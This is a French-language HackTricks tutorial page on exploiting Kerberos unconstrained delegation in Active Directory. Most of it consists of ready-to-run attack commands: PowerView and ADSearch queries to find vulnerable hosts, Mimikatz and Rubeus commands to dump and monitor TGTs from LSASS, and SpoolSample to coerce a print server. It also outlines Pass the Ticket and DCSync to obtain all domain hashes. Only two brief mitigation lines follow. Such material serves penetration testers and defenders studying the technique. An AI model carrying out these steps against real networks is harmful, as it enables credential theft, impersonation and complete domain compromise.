hacktricks/windows-hardening/active-directory-methodology/unconstrained-delegation.md

Délégation sans contrainte

Il s'agit d'une fonctionnalité qu'un administrateur de domaine peut activer sur n'importe quel ordinateur du domaine. Ensuite, chaque fois qu'un utilisateur se connecte à l'ordinateur, une copie du TGT de cet utilisateur est envoyée dans le TGS fourni par le DC et enregistrée en mémoire dans LSASS. Ainsi, si vous avez des privilèges d'administrateur sur la machine, vous pourrez extraire les tickets et usurper l'identité des utilisateurs sur n'importe quelle machine.

Ainsi, si un administrateur de domaine se connecte à un ordinateur avec la fonctionnalité "Délégation sans contrainte" activée, et que vous avez des privilèges d'administrateur local sur cette machine, vous pourrez extraire le ticket et usurper l'identité de l'administrateur de domaine n'importe où (élévation de privilèges de domaine).

Vous pouvez trouver des objets ordinateurs avec cet attribut en vérifiant si l'attribut userAccountControl contient ADS_UF_TRUSTED_FOR_DELEGATION. Vous pouvez le faire avec un filtre LDAP de '(userAccountControl:1.2.840.113556.1.4.803:=524288)', c'est ce que fait Powerview :

# Liste des ordinateurs sans contrainte
## Powerview
Get-NetComputer -Unconstrained #Les DC apparaissent toujours mais ne sont pas utiles pour l'élévation de privilèges
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Exporter les tickets avec Mimikatz
privilege::debug
sekurlsa::tickets /export #Méthode recommandée
kerberos::list /export #Autre méthode

# Surveiller les connexions et exporter les nouveaux tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Vérifier toutes les 10 secondes les nouveaux TGTs

Chargez le ticket de l'administrateur (ou de l'utilisateur victime) en mémoire avec Mimikatz ou Rubeus pour un Pass the Ticket.
Plus d'informations : https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Plus d'informations sur la délégation sans contrainte sur ired.team.

Forcer l'authentification

Si un attaquant est capable de compromettre un ordinateur autorisé pour la "Délégation sans contrainte", il pourrait tromper un serveur d'impression pour se connecter automatiquement à celui-ci en enregistrant un TGT dans la mémoire du serveur.
Ensuite, l'attaquant pourrait effectuer une attaque Pass the Ticket pour usurper le compte d'utilisateur du serveur d'impression.

Pour faire en sorte qu'un serveur d'impression se connecte à n'importe quelle machine, vous pouvez utiliser SpoolSample :

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Si le TGT provient d'un contrôleur de domaine, vous pouvez effectuer une attaque DCSync et obtenir tous les hachages du DC.
Plus d'informations sur cette attaque sur ired.team.

Voici d'autres façons d'essayer de forcer une authentification:

{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

Atténuation

• Limiter les connexions DA/Admin à des services spécifiques
• Définir "Le compte est sensible et ne peut pas être délégué" pour les comptes privilégiés.

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT!
• Découvrez The PEASS Family, notre collection exclusive de NFTs
• Obtenez le swag officiel PEASS & HackTricks
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
• Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.